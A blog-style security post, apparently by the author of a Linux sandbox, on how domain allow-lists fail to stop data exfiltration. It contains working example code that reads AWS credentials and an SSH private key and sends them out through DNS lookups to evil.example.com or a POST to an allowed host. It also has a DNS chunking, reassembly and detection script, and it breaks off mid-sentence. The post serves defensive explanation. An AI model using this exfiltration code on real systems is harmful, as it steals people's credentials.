Say you run a piece of untrusted code – an AI-generated script, a dependency's postinstall hook, a build step from a repo you just cloned – inside a sandbox. You lock it down: no filesystem access outside the working directory, no network except the one domain it legitimately needs, no dangerous syscalls. That stops a lot of bad behavior.

It also has a blind spot, and it's a big one.

I ran into this building Canister, a lightweight, unprivileged Linux sandbox – it stacks user namespaces, seccomp, and network isolation to run untrusted commands with minimal privileges, no root and no container runtime. But the blind spot below isn't specific to Canister. It applies to any sandbox whose network policy is a domain allow-list, which is most of them.

## The problem network allow-lists don't solve

Say you're running an `npm install` for a project that needs to reach registry.npmjs.org. You add that domain to your allow-list. The install runs. Everything works.

Except the dependency you just installed contains this:

```javascript
const dns = require('dns');
const fs = require('fs');

// Read a secret the sandbox lets the script see: HOME is inside the allowed filesystem.
const secrets = fs.readFileSync(process.env.HOME + '/.aws/credentials', 'utf8');
const encoded = Buffer.from(secrets).toString('base64');

// The query itself is the exfiltration: whoever runs the nameserver for
// evil.example.com logs every name asked of it. A label may be up to 63 bytes,
// so a 60-character chunk fits. No answer is needed, so the callback ignores errors.
dns.resolve(`${encoded.substring(0, 60)}.evil.example.com`, () => {});
```

Your network policy allows DNS. It has to: a domain allow-list can only be enforced after names are resolved, so the sandbox can always reach a resolver, and a resolver forwards a query for any name without looking at what the labels contain. The script exfiltrates your AWS credentials via DNS subdomain lookups. No unauthorized connection. No blocked domain. The data leaves through a channel you explicitly permitted.

Or consider a build script that posts logs to an allowed analytics endpoint:

```python
import base64
import os

import requests

# Read a key the sandbox lets the script see.
token = open(os.path.expanduser("~/.ssh/id_ed25519")).read()

# The destination is on the allow-list, so the request is permitted; the secret
# rides along in the body, base64-encoded so it looks like ordinary log data.
requests.post(
    "https://allowed-analytics.example.com/log",
    data={"log": base64.b64encode(token.encode()).decode()},
)
```

Your SSH private key, base64-encoded, flows to an endpoint your policy allows. The sandbox did its job. The network filter did its job. The secret still leaked.

This is the gap network-level policies can't close.
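To make the DNS case concrete, here is an added example (not Canister's code and not from the original post) showing both sides of the channel: how an exfil script splits a secret into query names, how the attacker's nameserver reassembles them, and a heuristic you could run over resolver logs to spot it. The log format, the `evil.example.com` domain, and the fake credentials file are all constructed for the example; base32 is used instead of the post's base64 because its alphabet is valid inside a hostname.

```python
import base64
import math
from collections import defaultdict
from typing import Optional

# Hypothetical attacker-controlled domain, as in the text.
EXFIL_DOMAIN = "evil.example.com"
LABEL_MAX = 60  # a DNS label is at most 63 bytes; the post's snippet uses 60


def exfil_labels(secret: bytes, domain: str = EXFIL_DOMAIN) -> list:
    """Split a secret into DNS query names the way a DNS-exfil script would.

    base32 (A-Z, 2-7) is used rather than base64 because '+', '/' and '=' are
    not valid hostname characters. Padding is stripped and restored on decode.
    """
    blob = base64.b32encode(secret).decode().rstrip("=").lower()
    chunks = [blob[i:i + LABEL_MAX] for i in range(0, len(blob), LABEL_MAX)]
    # A sequence number leads each name so the receiver can reorder queries.
    return [f"{i}.{chunk}.{domain}" for i, chunk in enumerate(chunks)]


def reassemble(qnames: list, domain: str = EXFIL_DOMAIN) -> bytes:
    """What the attacker's authoritative nameserver does: reorder and decode."""
    suffix = "." + domain
    parts = {}
    for q in qnames:
        if not q.endswith(suffix):
            continue
        seq, chunk = q[:-len(suffix)].split(".", 1)
        parts[int(seq)] = chunk
    blob = "".join(parts[i] for i in sorted(parts)).upper()
    blob += "=" * (-len(blob) % 8)  # restore base32 padding
    return base64.b32decode(blob)


def shannon_entropy(s: str) -> float:
    """Bits per character of s; encoded data sits well above normal hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def flag_query(qname: str, long_label: int = 30, entropy_bits: float = 3.5) -> Optional[str]:
    """Return a reason if the query name looks like a data carrier, else None.

    Two signals: an unusually long label, or a label whose characters are
    near-uniformly distributed. Thresholds are illustrative, not tuned.
    """
    for label in qname.rstrip(".").split("."):
        if len(label) >= long_label:
            return f"label of length {len(label)}"
        if len(label) >= 16 and shannon_entropy(label) >= entropy_bits:
            return f"high-entropy label ({shannon_entropy(label):.2f} bits/char)"
    return None


def scan_log(lines: list) -> list:
    """Run flag_query over '<time> <client> <qname>' lines; return (qname, reason) hits."""
    hits = []
    for line in lines:
        qname = line.split()[-1]
        reason = flag_query(qname)
        if reason:
            hits.append((qname, reason))
    return hits


# Constructed sample: a fake credentials file, not real keys.
FAKE_CREDS = (
    b"[default]\n"
    b"aws_access_key_id = AKIAEXAMPLEEXAMPLE01\n"
    b"aws_secret_access_key = exampleSecretExampleSecret0000\n"
)

# Constructed resolver log: benign lookups for allow-listed hosts with the
# exfil queries interleaved, as a sandbox resolver would see them.
SAMPLE_LOG = (
    ["2024-01-01T10:00:00Z 10.0.0.5 registry.npmjs.org",
     "2024-01-01T10:00:01Z 10.0.0.5 cdn.jsdelivr.net"]
    + [f"2024-01-01T10:00:02Z 10.0.0.5 {q}" for q in exfil_labels(FAKE_CREDS)]
    + ["2024-01-01T10:00:03Z 10.0.0.5 api.github.com"]
)

if __name__ == "__main__":
    for qname, reason in scan_log(SAMPLE_LOG):
        print(f"SUSPECT {qname}: {reason}")
    recovered = reassemble([line.split()[-1] for line in SAMPLE_LOG])
    print("attacker recovers the file intact:", recovered == FAKE_CREDS)
```

The detector only ever sees query names, which is exactly why it says nothing about the second example: an HTTPS POST to an allow-listed host carries its payload inside TLS, and no name-based or address-based filter looks at it. Label-length and entropy heuristics are also easy to dodge with shorter chunks and dictionary-word encodings, so treat this as a tripwire, not a control.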
The threat isn’t just unauthorized c...